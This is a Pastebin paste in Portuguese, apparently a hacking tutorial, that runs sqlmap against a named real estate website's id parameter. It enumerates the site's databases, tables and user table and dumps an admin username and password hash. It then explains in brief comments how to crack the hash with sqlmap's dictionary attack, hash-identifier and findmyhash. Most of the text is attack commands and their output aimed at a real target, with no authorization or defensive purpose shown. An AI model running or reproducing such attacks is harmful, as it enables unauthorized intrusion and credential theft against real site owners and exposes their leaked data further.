API tools faq
paste
Advertisement
Guest User

Sqlmap e Metasploit

a guest
May 12th, 2013
1,068
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
DCL 6.09 KB | None | 0 0
raw download clone embed print report
  1.  
  2. python sqlmap.py -u http://www.invistaconquista.com.br/imoveis_detalhes.php?id=12 -f -b --current-user --current-db --dbs --is-dba
  3.  
  4. [11:29:15] [INFO] fetching database names
  5. [11:29:15] [INFO] the SQL query used returns 2 entries
  6. [11:29:15] [INFO] resumed: "information_schema"
  7. [11:29:15] [INFO] resumed: "invista_invista"
  8. available databases [2]:                                                                                                    
  9. [*] information_schema
  10. [*] invista_invista
  11.  
  12. python sqlmap.py -u http://www.invistaconquista.com.br/imoveis_detalhes.php?id=12  --tables -D invista_invista Database: invista_invista
  13. back-end DBMS: MySQL 5
  14. [11:34:09] [INFO] fetching tables for database: 'invista_invista'
  15. [11:34:09] [INFO] the SQL query used returns 10 entries
  16. [11:34:09] [INFO] resumed: "banners"
  17. [11:34:09] [INFO] resumed: "bannersfesta"
  18. [11:34:09] [INFO] resumed: "imoveis_bairro"
  19. [11:34:09] [INFO] resumed: "imoveis_descricao"
  20. [11:34:09] [INFO] resumed: "imoveis_finalidade"
  21. [11:34:09] [INFO] resumed: "imoveis_fotos"
  22. [11:34:09] [INFO] resumed: "imoveis_tipo"
  23. [11:34:09] [INFO] resumed: "newsletter"
  24. [11:34:09] [INFO] resumed: "noticias"
  25. [11:34:09] [INFO] resumed: "usuario"
  26. Database: invista_invista                                                                                                  
  27. [10 tables]
  28. +--------------------+
  29. <PIPE> banners            <PIPE>
  30. <PIPE> bannersfesta       <PIPE>
  31. <PIPE> imoveis_bairro     <PIPE>
  32. <PIPE> imoveis_descricao  <PIPE>
  33. <PIPE> imoveis_finalidade <PIPE>
  34. <PIPE> imoveis_fotos      <PIPE>
  35. <PIPE> imoveis_tipo       <PIPE>
  36. <PIPE> newsletter         <PIPE>
  37. <PIPE> noticias           <PIPE>
  38. <PIPE> usuario            <PIPE>
  39. +--------------------+
  40. python sqlmap.py -u http://www.invistaconquista.com.br/imoveis_detalhes.php?id=12 --columns -D invista_invista -T usuario
  41. [11:37:33] [INFO] the SQL query used returns 2 entries
  42. [11:37:33] [INFO] resumed: "u2_usuario","varchar(255)"
  43. [11:37:33] [INFO] resumed: "u3_senha","varchar(255)"
  44. Database: invista_invista                                                      
  45. Table: usuario
  46. [2 columns]
  47. +------------+--------------+
  48. <PIPE> Column     <PIPE> Type         <PIPE>
  49. +------------+--------------+
  50. <PIPE> u2_usuario <PIPE> varchar(255) <PIPE>
  51. <PIPE> u3_senha   <PIPE> varchar(255) <PIPE>
  52. +------------+--------------+
  53. python sqlmap.py -u http://www.invistaconquista.com.br/imoveis_detalhes.php?id=12 --columns -D invista_invista -T usuario -C u2_usuario,u3_senha Database : invista_invista
  54. web application technology: PHP 5.2.17
  55. back-end DBMS: MySQL 5
  56. do you want sqlmap to consider provided column(s):
  57. [1] as LIKE column names (default) <--- aceite
  58.  
  59.  
  60. fase aceita dicionario sqlmap
  61. [2] as exact column names
  62. [11:42:38] [INFO] fetching columns like 'u2_usuario, u3_senha' for table 'usuario' in database 'invista_invista'
  63. [11:42:38] [INFO] the SQL query used returns 2 entries
  64. [11:42:38] [INFO] resumed: "u2_usuario","varchar(255)"
  65. [11:42:38] [INFO] resumed: "u3_senha","varchar(255)"
  66. [11:42:39] [INFO] fetching entries of column(s) 'u2_usuario, u3_senha' for table 'usuario' in database 'invista_invista'    
  67. [11:42:39] [INFO] the SQL query used returns 1 entries
  68. [11:42:40] [WARNING] reflective value(s) found and filtering out
  69. [11:42:40] [INFO] retrieved: "invista","*1AC0E47A8D7C4C3F3E5C8990D978D092B3BF5D24"
  70. [11:42:41] [INFO] analyzing table dump for possible password hashes                                                        
  71. recognized possible password hashes in column 'u3_senha'. Do you want to crack them via a dictionary-based attack? [Y/n/q] <---yes
  72. what dictionary do you want to use?
  73. [1] default dictionary file '/pentest/database/sqlmap/txt/wordlist.txt' (press Enter) <---aceita
  74. [2] custom dictionary file
  75. [3] file with list of dictionary files
  76. [11:44:09] [INFO] using default dictionary
  77. [11:44:09] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'
  78. do you want to use common password suffixes? (slow!) [y/N] <--- sim
  79. [11:44:39] [INFO] starting dictionary-based cracking (mysql_passwd)
  80. [11:44:39] [INFO] starting 2 processes
  81.                                                                                            
  82. [11:45:09] [INFO] using suffix '12'   passa varias vezes (normal)    
  83. atabase: invista_invista
  84. Table: usuario
  85. [1 entry]
  86. +-------------------------------------------+------------+
  87. <PIPE> u3_senha                                  <PIPE> u2_usuario <PIPE>
  88. +-------------------------------------------+------------+
  89. <PIPE> *1AC0E47A8D7C4C3F3E5C8990D978D092B3BF5D24 <PIPE> invista    <PIPE>
  90. +-------------------------------------------+------------+
  91. senhans quase sempre em md5      
  92.  
  93. Para identificar usaremos o hash-identifier :
  94. /pentest/passwords/hash-identifier#
  95. /pentest/passwords/hash-identifier#./hash_id.py
  96.  #########################################################################
  97.    #     __  __                     __           ______    _____           #
  98.    #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
  99.    #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
  100.    #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
  101.    #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
  102.    #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
  103.    #        \/_/\/_/\/__/\/_/\/___/   \/_/\/_/    \/_____/ \/___/ v1.1 #
  104.    #                                                             By Zion3R #
  105.    #                                                    www.Blackploit.com #
  106.    #                                                   Root@Blackploit.com #
  107.    #########################################################################
  108.  
  109.    -------------------------------------------------------------------------
  110.  HASH:  1AC0E47A8D7C4C3F3E5C8990D978D092B3BF5D24 <-- cole a senha aqui
  111.  
  112. SE NÃO ACHAR USE ESSE PROGRAMA AQUI PRA VER SE QUEBRA
  113. https://code.google.com/p/findmyhash/downloads/detail?name=findmyhash_v1.1.2.py
  114.  
  115. ASSIM
  116. cd Descktop
  117. Desktop#python findmyhash_v1.1.2.py -MD5 -h  1AC0E47A8D7C4C3F3E5C8990D978D092B3BF5D24
  118. se aparecer  que ele ta rachada contegiu
  119.  
  120. obs:apos baixar o programa  clic no  botão direito do mouse e escolha propiedades e escolha permisão
  121. a ultima opção executar como programa
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!